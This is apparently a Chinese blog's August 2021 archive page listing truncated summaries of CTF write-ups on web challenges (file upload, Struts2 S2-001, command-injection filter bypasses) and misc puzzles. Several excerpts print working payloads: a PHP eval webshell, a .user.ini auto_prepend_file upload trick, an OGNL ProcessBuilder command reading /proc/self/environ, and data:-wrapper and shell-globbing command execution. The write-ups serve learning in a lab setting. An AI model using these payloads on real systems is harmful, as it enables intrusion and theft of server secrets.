08 2021 档案
摘要:进去就这一句话,前端和抓包没信息,估计是扫描 然而可能是御剑太老了,没扫描出 而dirsearch不知道为啥429直接退出了 这里推荐一个目录扫描工具,这里是它的自我介绍 python dirmap.py -i http://529f95dc-abc0-4c2a-9953-4e3bba6146f1.
阅读全文
摘要:文件上传,首先上传一张图片马试试 提示<?被过滤,可以用下面代码绕过 <script language="php">eval($_POST{attack});</script> 显示上传成功,和已经上传的文件 下面就是想办法上传有效的后门 根据尝试,大部分后缀例如php3,php4,phtml均被过
阅读全文
摘要:WEB279 有一句话可以点击,点击跳转 看url是S2-001的漏洞,直接百度 %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/proc/self/environ"})).redirectErrorStream(
阅读全文
摘要:WEB151 抓包改个名字即可 WEB152 同上,随便传个图片马 WEB153 考点是.user.ini 注意上传图片目录下有个index.php 即/upload/index.php 首先上传一个1.png图片马 上传auto_prepend_file = 1.png 的.user.ini 这样
阅读全文
摘要:本来主要做web的,这次变成杂项了。。。 Misc游戏 多选killing即可,有flag选flag,其他看运气 吃瓜 下载发现一张png,没法打开,二进制查看发现是压缩包 改后缀zip 解压发现题目: 看文本内容: 发现是图片base64:找网站解码 扫码 cfhwc19abika_etso{h_
阅读全文
摘要:warmup 传入file,检查file后缀是不是php,是就包含 用data伪协议 file=data:text/plain,<?=system(%27ls%27);?>.php 发现system()被禁用 glob看下文件 file=data:text/plain,<?php print_r(g
阅读全文
摘要:WEB54 过滤了 一大堆东西,和之前不一样的是不能中间加\或者''绕过,但是可以用?和* 解法一: 没过滤rev函数,该函数是文件里面按字节逆序输出 c=rev${IFS}f??????? 要手动或者脚本把flag逆序一下 方法二: 不能直接用cat,但是可以在cat路径里找到他,再用?模糊匹配
阅读全文
摘要:WEB42 >是写入 而1和2意思百度一下: 那么就是不管标准输出还是错误输出都输入到null里销毁 构造两个语句即可绕过 c=cat flag.php;ls WEB43 过滤了;和cat 其他同上一题 过滤分号用&&或||代替 注意url别直接输入&要转码 cat能代替的一大堆 c=more fl
阅读全文
摘要:web40 别看这里过滤了这么多,其实他过滤的括号是中文括号,这里我开始纳闷了好久 先说一个打印当初路径下文件的函数:print_r(scandir('.')) 但是很明显单引号和小数点已经过滤了,这里要先办法绕过 最简单的方法是利用函数传参,那就找当前能用包含小数点的函数 还真有:localeco
阅读全文
摘要:1 <?php 2 3 include "config.php"; 4 function filter($str) { 5 if(preg_match("/system|exec|passthru|shell_exec|pcntl_exec|bin2hex|popen|scandir|hex2bin
阅读全文
摘要:misc1 直接给了 misc2 获得二进制文本,直接改后缀试试 misc3 题目给了一个bpg文件,BPG 是一种 JPEG 图像格式最有效压缩。可以用bgpviewer工具查看 misc4 获得6个txt文本,用二进制查看器看一下 看到不同图片的格式头部 但是全改为png,就能看到flag mi
阅读全文
